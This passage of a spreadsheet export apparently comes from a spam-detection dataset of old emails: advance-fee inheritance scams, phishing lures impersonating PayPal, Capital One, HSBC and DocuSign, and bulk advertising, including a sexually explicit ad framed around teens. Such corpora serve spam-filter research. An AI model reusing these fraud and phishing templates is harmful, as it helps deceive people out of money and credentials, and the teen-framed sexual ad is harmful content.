have deposited in a Security company all the funds realised from the sales of my farmland and other farming equipment which amounted to USD8.5,000,000.00 (Eight million five hundred thousand United States Dollars). These  funds was packaged in two trunk boxes and declared as Gemstones to avoid much demurrage from the security company and not to know of the exact  content so that they don't steal my money.It is to the knowledge of you and i that it is money that is in the trunk boxes.The trunk boxes of us$8.5m have been arranged and securely sealed, crated and then deposited with a security company ready for shipment abroad via diplomatic courier service so as to make it immune to custom and other bureaucratic checks at the ports. \n\nThe reason for this is because it is the only way the funds can be transferred without any problems.\nFor now, I stay in U A E because Zimbabwe is highly unsafe for me and my family. You can mail your immediate response to me. Upon your immediate response, I will immediately arrange and send to you all the documentation that will empower your good self in finalizing the transaction with the security company.\n\n Let me use this opportunity to also inform you that this transaction is 100% risk free and should\nalso be handled in the most confidential manner.\n\nI have options to offer you, first you can choose to have certain percentage of the money for your assistance, or you can go into partnership for a proper profitable investment of the money in your country. Which ever option you choose, feel free to notify me. \n\nIf for some reasons you do not prefer a partnership, I am willing to give you 25% of the money while the  remaining 75% that is meant for me, will be for the investment in your country.\n\nSo based on the above, it is important you communicatewith me. On the event that you cannot assist me to do the business, I beg you to still keep my contact andexistence of my fund a secret.\n \nI also require you to make available to me the following\n \n1)Your Complete name.\n \n2)Your confidential telephone and fax numbers to enable me comminicate with you easily.\n \n Sincerely Yours,\n\nHASSAN   GEORGE   .\n  </t>
  </si>
  <si>
    <t>http://www.rte.ie</t>
  </si>
  <si>
    <t>1418</t>
  </si>
  <si>
    <t>To: nan\nFrom: Nera wangushi &lt;nera_wangushi@hotmail.com&gt;\nDate: Tue, 26 Jul 2005 05:42:11 -0400</t>
  </si>
  <si>
    <t>Tue, 26 Jul 2005 05:42:11 -0400</t>
  </si>
  <si>
    <t>Nera wangushi &lt;nera_wangushi@hotmail.com&gt;</t>
  </si>
  <si>
    <t>ENQUIRY</t>
  </si>
  <si>
    <t>\nRef: ZA-296-ENQR / Wing Lung\n\n\nI work for Yokozuna Financial Consultancy that is in the middle of a \nvery important enquiry. I am getting in touch with you on behalf of our \nclient, which is a top Chinese Bank (Wing Lung Bank).\nWe are conducting a search for any next of kin for a particular \ninvestor who has passed on.\n\nPlease do you have any relatives who migrated to Hong Kong in 1967 and passed away in 1980. Also are you aware of any relatives who might have been into real estate or a huge investor in Energy.\n\nWe understand that this might be all too sudden for you, however we \nwill appreciate that you get back to us even if no one of the above \ndescription is known to you.\nThis will help us put an end to this matter. The reason we are getting \nin touch with you is because you share the same name with the \nindividual.\n\nPlease can you send us a mail indicating if you know any one with the \nabove description. Also If no one of such description is known to you \nplease send us a mail stating that, as this Will help us stop further \ncommunication with you.\nCan you please send your reply to me , as I am in charge of  this \nenquiry.\nPlease kindly get in touch by email to this enquiry, as this will  \nenable us stop further communication with you.\nThanks,\nNera Wangushi\n\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://yoursite.com</t>
  </si>
  <si>
    <t>94</t>
  </si>
  <si>
    <t>To: nan\nFrom: &lt;paypal@support.com&gt;\nDate: Tue, 26 Jan 2016 01:22:38 -0000</t>
  </si>
  <si>
    <t>Tue, 26 Jan 2016 01:22:38 -0000</t>
  </si>
  <si>
    <t>&lt;paypal@support.com&gt;</t>
  </si>
  <si>
    <t>Paypal URGENT</t>
  </si>
  <si>
    <t>PayPal is constantly working to ensure security by regularly screening the accounts in our system. We recently reviewed your account, and we need more information to help us provide you with secure service. Until we can collect this information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologize for the inconvenience.\n\nWhy is my account access limited?\n\nYour account access has been limited for the following reason(s):\n\nJan 26 , 2016: We want to check with you to make sure that no one has logged in to your account without your permission.\n\nSign in and coplete the verification.\nPlease copy this link and paste it into your web browser :  [URL]http://safescopeadvance.esy.es[/URL]\n\n\n(Your case ID for this reason is PP-004-499-823-182.)\n\n\n/Help Center | Security Center\n\nCopyright  2016 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.\n\n\nPayPal Email ID PP1469\n\n</t>
  </si>
  <si>
    <t>http://safescopeadvance.esy.es</t>
  </si>
  <si>
    <t>324</t>
  </si>
  <si>
    <t>To: 2003vincent@freesurf.fr\nFrom: barrister vincent usman &lt;2003vincent@freesurf.fr&gt;\nDate: Tue, 26 Aug 2003 01:14:46 +0200</t>
  </si>
  <si>
    <t>Tue, 26 Aug 2003 01:14:46 +0200</t>
  </si>
  <si>
    <t>barrister vincent usman &lt;2003vincent@freesurf.fr&gt;</t>
  </si>
  <si>
    <t>2003vincent@freesurf.fr</t>
  </si>
  <si>
    <t>!!!ASSISTANCE NEEDED!!!</t>
  </si>
  <si>
    <t>Attention: Friend,\n\nI am Barrister Vincent Usman a Solicitor. I am the Personal Attorney to Mr.\nJohn Anderson a foreigner, who was a contractor to Shell Petroleum\nDevelopment Company in Nigeria(SPDC). On the 26th of September 1992, my\nclient, his wife and their three children were involved in a Plane crash on\ntheir way to Yankari Games Reserve for 2week`s holiday.\n\nUnfortunately they all lost their lives in the plane crash, Since then I\nhave made several enquiries to his Embassy and the home address he filled\nin his file in my office to locate any of his extended relatives, this has\nalso proved unsuccessful. After these several unsuccessful attempts, I\ndecided to use the Internet to locate any member of his family but to no\navail, hence I contacted you.\n\nI contacted you to assist in repatriating the money and property left\nbehind by my client before they get confiscated or declared unserviceable\nby the SECURITY &amp; FINANCE HOUSE where this fund is deposited. Particularly,\nthe FINANCE HOUSE where the deceased had an account valued at about US$9M\n(Nine million dollars). Conseqently, the bank issued me a notice to provide\nthe next of kin or have the account confiscated.\n\nsince I have been unsuccessful in locating the relatives for over 10 years\nnow. I seek your consent to present you as the next of kin of the deceased\nsince you are a foreigner so that the proceeds of this account valued at\nUS$9M can be paid to you and I. We shall share the money thus 55% to me and\n40% to you, while 5% will be used to re-imburse any expenses that might be\nincurred on both ends and to service the tax that might incur be in your\ncountry.\n\nI have all the necessary legal documents that can be used to back up any\nclaim we may make. All I require is your honest cooperation to enable us\nseeing this deal through. I guarantee that this will be executed under a\nlegitimate arrangement that will protect you from any breach of the law.\n\nYours Faithfully,\n\nBarrister Vincent Usman(Esq).\n\nN.B. Please indicate your telephone and fax numbers for easy communication\nin this mutual transaction.\n\n\n----------------------------------------------------------------\nCe service de mailing vous est offert par [URL]http://www.freesurf.fr[/URL]\nFreeSurf, votre acces ADSL a partir de 29 euros/mois\n[URL]http://www.freesurf.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>To: "Business Owner" &lt;jose@monkey.org&gt;\nFrom: "Lisa Wilson via DocuSign" &lt;dse_NA3@docusign.net&gt;\nDate: Tue, 25 Sep 2018 10:08:43 -0700</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2018 10:08:43 -0700</t>
  </si>
  <si>
    <t>"Lisa Wilson via DocuSign" &lt;dse_NA3@docusign.net&gt;</t>
  </si>
  <si>
    <t>Re: Get Approved and Funded TODAY</t>
  </si>
  <si>
    <t>Hello Business Owner, Lisa Wilson has sent you a new DocuSign document to view and sign. Please click on the link below to begin signing. Hello, we received your inquiry for funding and can have your business approved within minutes. Terms up to 18 months with weekly payment options. We are a direct lender and can have you approved within minutes. APPLY NOW to see what you are approved for. Complete the Docusign application &amp; also attach the last 6 months of your business bank statements. If you have trouble attaching, you can reply back to this email with the statements or fax statements to 516-331-0696. Our direct line is 516-331-0689. To unsubscribe: [URL]https://criticalfinance.wufoo.com[/URL]      REVIEW DOCUMENT [URL]https://na3.docusign.net[/URL] If clicking the link does not work, you can highlight and copy the entire line above and paste it into your browser to get started. This message was sent to you by Lisa Wilson who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request. Do Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center. [URL]https://support.docusign.com[/URL] EnvelopeActivation Lisa Wilson sent you a document to review and sign.  REVIEW DOCUMENT  Lisa Wilson lisa@expandthebiz.comHello, we received your inquiry for funding and can have your business approved within minutes. Terms up to 18 months with weekly payment options. We are a direct lender and can have you approved within minutes. APPLY NOW to see what you are approved for. Complete the Docusign application &amp; also attach the last 6 months of your business bank statements. If you have trouble attaching, you can reply back to this email with the statements or fax statements to 516-331-0696. Our direct line is 516-331-0689. To unsubscribe: [URL]https://criticalfinance.wufoo.com[/URL] Not Share This Email This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others.Alternate Signing Method Visit DocuSign.com, click 'Access Documents', and enter the security code: 64B800DACC684E4BB772DB10A08164003 About DocuSign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- DocuSign provides a professional trusted solution for Digital Transaction Management™. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. If you are having trouble signing the document, please visit the Help with Signing page on our Support Center.Download the DocuSign AppThis message was sent to you by Lisa Wilson who is using the DocuSign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.</t>
  </si>
  <si>
    <t>https://criticalfinance.wufoo.com https://na3.docusign.net https://support.docusign.com https://criticalfinance.wufoo.com</t>
  </si>
  <si>
    <t>372</t>
  </si>
  <si>
    <t>To: Recipients &lt;360@nonreply.com&gt;\nFrom: 360@nonreply.com\nDate: Tue, 25 Oct 2016 08:51:55 -0400</t>
  </si>
  <si>
    <t>Tue, 25 Oct 2016 08:51:55 -0400</t>
  </si>
  <si>
    <t>360@nonreply.com</t>
  </si>
  <si>
    <t>Recipients &lt;360@nonreply.com&gt;</t>
  </si>
  <si>
    <t>CAPITAL ONE ONLINE NEW MESSAGE</t>
  </si>
  <si>
    <t>Dear client of Capital One Bank,    Technical services of the Capital One Bank are carrying out a planned software upgrade. We earnestly ask you to sign in to avoid been blocked  To get started, please click the link below:    [URL]www.capitalone.com[/URL]    This instruction has been sent to all bank customers and is obligatory to follow.    Thank you,   Dear client of Capital One Bank, Technical services of the Capital One Bank are carrying out a planned software upgrade. We earnestly ask you to sign in to avoid been blocked To get started, please click the link below: [URL]www.capitalone.com[/URL]  This instruction has been sent to all bank customers and is obligatory to follow. Thank you,</t>
  </si>
  <si>
    <t>474</t>
  </si>
  <si>
    <t>To: R@M\nFrom: collins &lt;collinsngobe@fsmail.net&gt;\nDate: Tue, 25 Nov 2003 05:17:32 +0100</t>
  </si>
  <si>
    <t>Tue, 25 Nov 2003 05:17:32 +0100</t>
  </si>
  <si>
    <t>collins &lt;collinsngobe@fsmail.net&gt;</t>
  </si>
  <si>
    <t>&gt;From Mr collins ngobe\nbank of africa cotonou\nPlot 15 rue 17 port novo \nBenin republic west Africa\nTel/+229 459050\n\n\n\nAttn; Director\n\nDear sir\nI am Mr Collins Ngobe . \n\nI am  accounting officer in foriegn accounts department in our bank.During our last auditing in our Bank,My Department came across a very huge sum of money (6.5 million dollars)six million five hundred thousand dollars,belonging to a deceased customer of our Bank a national of your country,who died in the plane crash of 31 october 1999[Egyptian airline 990] with other passengers aboard confirmable at this,WEB-SITE([URL]www.cnn.com[/URL]\n\nSince then I have made several enquiries to your embassy to locate any of our clients extended relatives, this has  proved unsuccessful.After these several unsuccessful attempts, I decided to trace his relatives over the Internet, to locate any of his family member but of no avail. \n\nhence I contacted you for similarety of your name with that of our late customer. I need your assistance in evacuation of the funds left behind by our client in the Bank before they get confisicated or declared unserviceable by the Government,  because official, financial laws here stipulate it that after five years any fund or assets deposited with bank/security firm without claim or servicing, the money or assets will be divert to central bank as unclaime bill. \n\nsince I have been unsuccesfull in locating the relatives for over 2 years now, I seek your concent to present you as the next of kin of the deceased since you are from the same country so that the proceeds of this deposit valued at $6.5 million dollars can be paid to you and then you  will share me part of the money, \n\nI have all necessary legal documents that can be used to back up claim we may make. All I require is your honest cooperation to enable us see this deal through. I guarantee that this business will be executed under a legitimate arrangement that will protect you from any breach of the law.\n\nYou have to assure me that you will not sit on the fund when it is finally claimed.\n\nexpecting your quick response\n\nBest regards,\n   \n      \n \n \n\n \n  \n\n \n   \n  \n  \n  \n \n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>To: jochom12@hotmail.com\nFrom: JOHN CHOMA &lt;jochom12@hotmail.com&gt;\nDate: Tue, 25 Mar 2003 15:43:53 +0200</t>
  </si>
  <si>
    <t>Tue, 25 Mar 2003 15:43:53 +0200</t>
  </si>
  <si>
    <t>JOHN CHOMA &lt;jochom12@hotmail.com&gt;</t>
  </si>
  <si>
    <t>jochom12@hotmail.com</t>
  </si>
  <si>
    <t>No.13 VS2 Cethswayo Estate Generation-South Africa. Satelite phone nos: 882-164-6685262,+874-76727948 +871-76727948,+870-76727948. ......................................................        {URGENT AND CONFIDENTIAL} (RE: TRANSFER OF ($ 126,000.000.00 USD} {ONE HUNDRED AND TWENTY SIX MILLION DOLLARS) Dear sir, We want to transfer to overseas ($ 126,000.000.00 USD) One hundred and Twenty six million United States Dollars) from a Bank in Africa, I want to ask you to quietly  look for a reliable and honest person who will be capable and fit to provide either an existing bank account or to set up a new  Bank a/c immediately to receive this money, even an empty a/c can serve to receive this money, as long as you will remain honest to me till the end for this important business trusting in you and believing  in God that you will never let me down either now or in future. I am Mr.JOHN CHOMA,the Auditor General of a bank in Africa, during the course of our auditing  I discovered a floating fund  in an account opened in the bank in 1990 and since 1993 nobody has operated on this account again, after going through some old files in the records I discovered that the owner of the account  died without a [heir]  hence  the money is floating and  if I do not remit this money out urgently it will be forfeited for nothing. the owner of this account is  Mr. Phillip Morris, a foreigner, and a sailor, and  he died,  since 1993. and  no other person knows about this account or any thing concerning it, the account has no other beneficiary and my investigation proved to me as well that Phillip Morris until his death was the manager Morris &amp; Morris Coy.(pty). SA. We will start the  first transfer with Twenty six million [$26,000.000] upon successful transaction without any disappoint from your side, we shall re-apply for the payment of the remaining  rest amount to your account, The amount involved is (USD 126M) One hundred and Twenty Six million United States Dollars, only I want to first transfer $26,000.000 [Twenty Six million United States Dollar from this money into a safe foreigners account abroad before the rest, but I don't know any foreigner, I am only contacting you as a foreigner because this money can not be approved to a local person here, without valid international foreign passport, but can only be approved to any foreigner with valid international passport or drivers license and foreign a/c  because the money is in us dollars and the former owner of the  a/c  Mr. Phillip Morris is a foreigner too, [and the money can only be approved into a foreign a/c. However, we will sign a binding agreement, to bind us together I got your contact address  from the Girl who operates computer, I am revealing this to you with believe in God that you will never let me down in this business, you are the first and the only person that I am contacting for this business, so please reply urgently so that I will inform you the next step to take urgently. Send also your private telephone and fax number including the full details of the account to be used for the deposit. I want us to meet face to face to build confidence and to sign a binding agreement that will  bind us together  before transferring the money to any account of  your choice  where the fund will be safe. Before we fly to your country for withdrawal, sharing and investments. I need your full co-operation to make this work fine. because the management is ready to approve this payment to any foreigner who has correct information of this account, which I will give to you, upon your positive response and once I am convinced that you are  capable  and will meet up with instruction of  a key bank official who is deeply involved with me in this business. I need your strong assurance that you will never, never let me down. With my influence and the position of the bank official we can transfer this money to any foreigner's reliable account which you can provide with assurance that this money will be intact pending our physical arrival in your country for sharing. The bank official will destroy all documents of transaction immediately we receive this money leaving no trace to any place and to build confidence  you can  come immediately  to discuss with me face to face after which I will make this remittance in your presence and three of us will fly to your country at least two days ahead of the money going into the account. I will apply for annual leave to get visa immediately I hear from you that you are ready to act and receive this fund in your account. I will use my position and influence to obtain all legal approvals for  onward transfer of this money to your account with appropriate clearance from  the relevant  ministries and foreign exchange departments. At the conclusion of this business, you will be given 35% of the total amount, 60% will be for me, while 5% will be for expenses both parties might have incurred during the process of transferring. You should try to call me on my satelite phone no. 882-1646685262. if you are calling my No. dial the way you use to call other countries, do not put South African area code, because it is a satellite phone. I look forward to your earliest reply through my private email address: Sincerely, JOHN CHOMA. _________________________________________________________________ Bored? Lonely? Send a Love SMS and find your perfect cell-mate  [URL]http://www.msn.co.za[/URL]</t>
  </si>
  <si>
    <t>633</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: HSBC Bank Service &lt;e-marketing@hsbc.com.hk&gt;\nDate: Tue, 25 Jul 2017 05:21:21 +0000</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2017 05:21:21 +0000</t>
  </si>
  <si>
    <t>HSBC Bank Service &lt;e-marketing@hsbc.com.hk&gt;</t>
  </si>
  <si>
    <t>Fwd: Wire Transfer</t>
  </si>
  <si>
    <t>Dear, Please, download/view your wire transfer advice, Payment was made today.  [1] DOWNLOAD [1] | VIEW [1]  1 Attachments | Swift Copy IMG-Invoice INV0172006.pdf&amp;amp;jpeg | Download as zip [1] Yours faithfully, Global Payments and Cash Management HSBC     -------------------------  This is an auto-generated email. Any replies to this email will be disregarded. 		  (c) Copyright. HSBC Bank plc 2016. All rights reserved. Privacy &amp; Data Protection Statement | Terms &amp; Conditions     Links: ------ [1] [URL]https://od.lk[/URL]     Dear,Please, download/view your wire transfer advice, Payment was made today.  DOWNLOAD | VIEW 1 Attachments | Swift Copy IMG-Invoice INV0172006.pdf&amp;amp;amp;jpeg | Download as zip Yours faithfully,Global Payments and Cash ManagementHSBC    This is an auto-generated email.Any replies to this email will be disregarded.     © Copyright. HSBC Bank plc 2016. All rights reserved.Privacy &amp; Data Protection Statement | Terms &amp; Conditions</t>
  </si>
  <si>
    <t>https://od.lk</t>
  </si>
  <si>
    <t>2371</t>
  </si>
  <si>
    <t>To: alicelacson8@latinmail.com &lt;alicelacson8@latinmail.com&gt;\nFrom: alice lacson &lt;alicelacson8@latinmail.com&gt;\nDate: Tue, 25 Jul 2006 14:14:23 +0200</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2006 14:14:23 +0200</t>
  </si>
  <si>
    <t>alice lacson &lt;alicelacson8@latinmail.com&gt;</t>
  </si>
  <si>
    <t>alicelacson8@latinmail.com &lt;alicelacson8@latinmail.com&gt;</t>
  </si>
  <si>
    <t>From Mrs Alice.</t>
  </si>
  <si>
    <t>&gt;From Mrs Alice.\nPLEASE REPLY WITH THISEMAIL.(alicelacson08@yahoo.fr)\n \nHi,My name is Alice Lacson,The wifeof Mr.Panfilo Lacson a senator during president joseph Estrada regime inPhilippine.who is receently killed in philippine.During my husband'sregime as a senator,I realized some reasonable amount of money fromvarious deals that I successfully executed and my buisness in the unitedstate of which the Government has block most of my account in the bankof america,trying to leave me with nothingwell before my late husbandwas killed,I secretly put in a box the sum of $18,000,000 million USDdeposit it in a security company abroad.\n \nI am contacting you becauseI want you to help me in securing the money for the future of mychildren since the government now monitor all my movement.I hope totrust you as who will not sit on this money when you claim it.i willgive you 15% of the total money for your assistance.if you are\nwilling to help me,email me at (alicelacson08@yahoo.fr)\nBest regards \nMrsAlice.\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>2370</t>
  </si>
  <si>
    <t>To: tragedyv13@yahoo.com\nFrom: jason leceister &lt;jasonleceister@virgilio.it&gt;\nDate: Tue, 25 Jul 2006 01:49:56 +0100</t>
  </si>
  <si>
    <t>Tue, 25 Jul 2006 01:49:56 +0100</t>
  </si>
  <si>
    <t>jason leceister &lt;jasonleceister@virgilio.it&gt;</t>
  </si>
  <si>
    <t>tragedyv13@yahoo.com</t>
  </si>
  <si>
    <t>FROM Ms.JASON LECEISTER</t>
  </si>
  <si>
    <t>Attn: Sir/Madam,\n\n{HIGHLY CONFIDENTIAL}\n(RE: TRANSFER OF (THIRTY SIX \nMILLION SEVEN HUNDRED AND\nFIFTY NINE THOUSAND POUNDS STERLINGS)\nRE: \nTRANSFER OF 36,759,000.00 MILLION POUNDS TO YOUR\nACCOUNT.\nMy name is Mr.\nJason Leicester and I work in the International Operation Department in \na Bank here in London.I feel quite safe dealing with you in this \nimportant business.Though, this medium (Internet) has been greatly \nabused, I choose to reach you through it because it still remains the \nfastest medium of communication. However, this correspondence is \nunofficial and private, and it should be treated as such. \n\nAt first I \nwill like to assure you that this transaction is 100% risk and trouble \nfree to both parties. WE WANT TO TRANSFER OUT MONEY FROM OUR BANK HERE \nIN LONDON. THE FUND FOR TRANSFER IS OF CLEAN ORIGIN. THE OWNER OF THIS \nACCOUNT IS A FOREIGNER, a program leader.Until his death,The Late Prime\nMinister, Mr. Rafik Hariri, has a huge investment here in the United \nKingdom and all over the world, as a matter of fact he has the sum of\n(THIRTY SIX MILLION SEVEN HUNDRED AND FIFTY NINE THOUSAND POUNDS \nSTERLINGS) in his account here in London which he deposited as a family \nvaluables.The family do not know about this deposit.I was on a routine \ninspection that I discovered a dormant domiciliary account with a BAL. \nOf (THIRTY SIX MILLION SEVEN HUNDRED AND FIFTY NINE THOUSAND POUNDS \nSTERLINGS) on further discreet investigation, I also discovered that \nthe account holder has passed away (dead) leaving no beneficiary to the \naccount. The bank will approve this money to any foreigner because the \nformer operator of the a/c is a foreigner. I am certainly sure that \nnobody will come again for the claim of this money. A foreigner can \nonly claim this money with legal claims to the account Holder, \n\nTherefore I need your cooperation in this transaction. I will provide \nall necessary information needed in order to claim this money.Hoping in \nGod that you will never let me down now and in future.o.k! Rafik Bahaa \nEdine Hariri (November 1, 1944 - February 14, 2005), married to Nazek \nAudi Hariri, was a Lebanese self-made billionaire and business tycoon, \nand was five times Prime Minister of Lebanon (1992-1998 and 2000-2004) \nbefore his last resignation from office on October 20,\n2004. The late \nRafik Hariri died on February 14, 2005 when explosives equivalent to \naround 300 kg of C4 were detonated as his motorcade drove past the \nSaint George Hotel i n the Lebanese capital, for more information \nplease log on to ([URL]http://www.hariri.info[/URL]\n\nI WANT TO TRANSFER THIS \nMONEY INTO A SAFE FOREIGN ACCOUNT ABROAD BUT I DON'T KNOW ANY FOREIGNER \nWHOM I CAN TRUST, I KNOW THAT THIS MESSAGE WILL COME TO YOU AS A \nSURPRISE AS WE DON'T KNOW OURSELVES BEFORE, BUT BE SURE THAT IT IS REAL \nAND A GENUINE BUSINESS. I CONTACT YOU BELIEVING THAT YOU WILL NOT LET \nME DOWN ONCE THE FUND GOES INTO YOUR ACCOUNT.\n\nBest Regards \n\nMr.Jason \nLeicester .\n\n\n</t>
  </si>
  <si>
    <t>http://www.hariri.info</t>
  </si>
  <si>
    <t>4520</t>
  </si>
  <si>
    <t>To: undisclosed-recipients:;\nFrom: "jaqwill" &lt;jaqwill@msn.com&gt;\nDate: Tue, 24 Sep 2002 23:57:03 -0700</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 23:57:03 -0700</t>
  </si>
  <si>
    <t>"jaqwill" &lt;jaqwill@msn.com&gt;</t>
  </si>
  <si>
    <t>Act Now - Reach Hundreds of Prospects</t>
  </si>
  <si>
    <t>_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/  S   P   E   C   I   A   L         R   E   P   O   R   T   How To Reliably Generate Hundreds Of Leads And Prospects Every Week!                 _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/         Our research has found that many online entrepreneurs have tried one or more of the following...     Free Classifieds? (Don't work anymore)     Web Site? (Takes thousands of surfers)     Banners? (Expensive and losing their punch)     E-Zine? (Hope they have a -huge- subscriber list)     Search Engines? (Forget it, unless you're in the top 10)              S O   W H A T   D O E S   W O R K ? Although often misunderstood, there is one method that has proven to succeed time-after-time.          E - M A I L   M A R K E T I N G ! ! Does the thought of $50,000 to $151,200.00 per year make you tingle with excitement?  Many of our customers make that and  more... Click here to find out how: http://[URL]http://32.97.166.75[/URL]  HERE'S WHAT THE EXPERTS HAVE TO SAY ABOUT E-MAIL MARKETING: "A gold mine for those who can take advantage of bulk e-mail programs" - The New York Times "E-mail is an incredible lead generation tool" - Crains Magazine Click here to find out how YOU can do it: http://[URL]http://32.97.166.75[/URL]  ========================================================== If you no longer wish to hear about future offers from us, send us a message with STOP in the subject line, by clicking here: mailto:list6644@postino.ch?Subject=Stop Please do not include any correspondence in your message to this automatic stop robot--it will not be read. All requests processed automatically. **********************************************************  [7(^(PO1:KJ)_8J7BJK9^":}H&amp;*T]</t>
  </si>
  <si>
    <t>http://32.97.166.75 http://32.97.166.75</t>
  </si>
  <si>
    <t>4513</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: Guage &lt;guage_420@aol.com&gt;\nDate: Tue, 24 Sep 2002 19:55:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 19:55:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Guage &lt;guage_420@aol.com&gt;</t>
  </si>
  <si>
    <t>I was so scared... my very first DP</t>
  </si>
  <si>
    <t>![]([URL]http://6.betahost.net[/URL] |  | **Legal Teen XXX Hardcore**  \n4 FREE  \n---  \nBoy was Gauge surprised when Joey's friend conveniently showed up as things\nwere getting hot. She always dreamed of sucking two cocks while she played\nwith herself during study hall, but fantasy is different than reality. I\nwonder if she ever gave a thought to where those dicks would end up after they\nwere done with her mouth?\n\nFind out for **100% FREE** at Legal Teen Girls!!! We just added Gauge's three\nway, you have to see it!!! We have tons of other sweet young teens getting it\nin ways they never imagined possible, for **FREE**!!!!  \n**CLICK HERE FOR YOUR 100% FREE LIFETIME MEMBERSHIP!**  \nDisclaimer:  \nWe are strongly against sending unsolicited emails to those who do not wish to\nreceive our special mailings. You have opted in to one or more of our\naffiliate sites requesting to be notified of any special offers we may run\nfrom time to time. We also have attained the services of an independent 3rd\nparty to overlook list management and removal services. This is NOT\nunsolicited email. If you do not wish to receive further mailings, please\nclick here to be removed from the list. Please accept our apologies if you\nhave been sent this email in error. We honor all removal requests.\n\n</t>
  </si>
  <si>
    <t>http://6.betahost.net</t>
  </si>
  <si>
    <t>4510</t>
  </si>
  <si>
    <t>To: #recipient#@webnote.net\nFrom: "WALL STREET BULLETIN..47717" &lt;Subscriber_Services78044@juno.com&gt;\nDate: Tue, 24 Sep 2002 17:39:44 -0500</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 17:39:44 -0500</t>
  </si>
  <si>
    <t>"WALL STREET BULLETIN..47717" &lt;Subscriber_Services78044@juno.com&gt;</t>
  </si>
  <si>
    <t>#recipient#@webnote.net</t>
  </si>
  <si>
    <t>FREE TRIAL - Last Stock pick UP 309%................................................. cqhcp</t>
  </si>
  <si>
    <t>\n\nSpecial Offer - FREE TRIAL\n\n**CLICK HERE**\n\n![]([URL]http://www.globalcybercollective.com[/URL]\n\n\n\n\n\nI'm not interested **click here**\n\nsajfdibpjnjppmhbymschktbn\n\n</t>
  </si>
  <si>
    <t>http://www.globalcybercollective.com</t>
  </si>
  <si>
    <t>4506</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: Casino@FrugalJoe.com\nDate: Tue, 24 Sep 2002 14:50:43 -0400</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 14:50:43 -0400</t>
  </si>
  <si>
    <t>Casino@FrugalJoe.com</t>
  </si>
  <si>
    <t>Get $100 Free - Beat the House at Royal Vegas!</t>
  </si>
  <si>
    <t>Never Pay Retail! :::::: Royal Vegas Online Casino -- Beat the House at Royal Vegas !!! ::::::                             You have received this email because you have subscribed        through one of our marketing partners. If you would like        to learn more about Frugaljoe.com then please visit our website        [URL]www.frugaljoe.com[/URL] If this message was sent to you in error, or if you        would like to unsubscribe please click here or cut and paste the following link into a web browser:  [URL]http://www.frugaljoe.com[/URL]\~moc.cnietonten^^mj\~1754388\~12a1</t>
  </si>
  <si>
    <t>4499</t>
  </si>
  <si>
    <t>To: Social@linux.ie\nFrom: "Visa for Bad Credit" &lt;prizemama@reply2.azoogle.com&gt;\nDate: Tue, 24 Sep 2002 10:41:21 GMT</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 10:41:21 GMT</t>
  </si>
  <si>
    <t>"Visa for Bad Credit" &lt;prizemama@reply2.azoogle.com&gt;</t>
  </si>
  <si>
    <t>Social@linux.ie</t>
  </si>
  <si>
    <t>[ILUG-Social] Need a Credit Card?</t>
  </si>
  <si>
    <t>1) Need a Credit Card? We'll get One for You!\n[URL]http://www.adclick.ws[/URL]\n\n2)) Auto Loans, Fast Approvals for Any Credit!\n[URL]http://www.adclick.ws[/URL]\n\n2) Are You Paying Too Much for Auto Insurance - Find Out?\n[URL]http://www.adclick.ws[/URL]\n\n3) Get Your Free Credit Report!\n[URL]http://www.adclick.ws[/URL]\n\nHave a wonderful day,\nOffer Manager\nPrizeMama\n\n\n\n\n\n------------------\nYou are receiving this email because you have opted-in to receive\nemail from publisher: prizemama.  To unsubscribe, click below:\n\n[URL]http://u2.azoogle.com[/URL]\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://www.adclick.ws http://u2.azoogle.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4503</t>
  </si>
  <si>
    <t>To: linda53@mail.gr\nFrom: kelli658@mail.gr\nDate: Tue, 24 Sep 2002 10:16:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 10:16:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>kelli658@mail.gr</t>
  </si>
  <si>
    <t>linda53@mail.gr</t>
  </si>
  <si>
    <t>Tired of paying big bucks for cable</t>
  </si>
  <si>
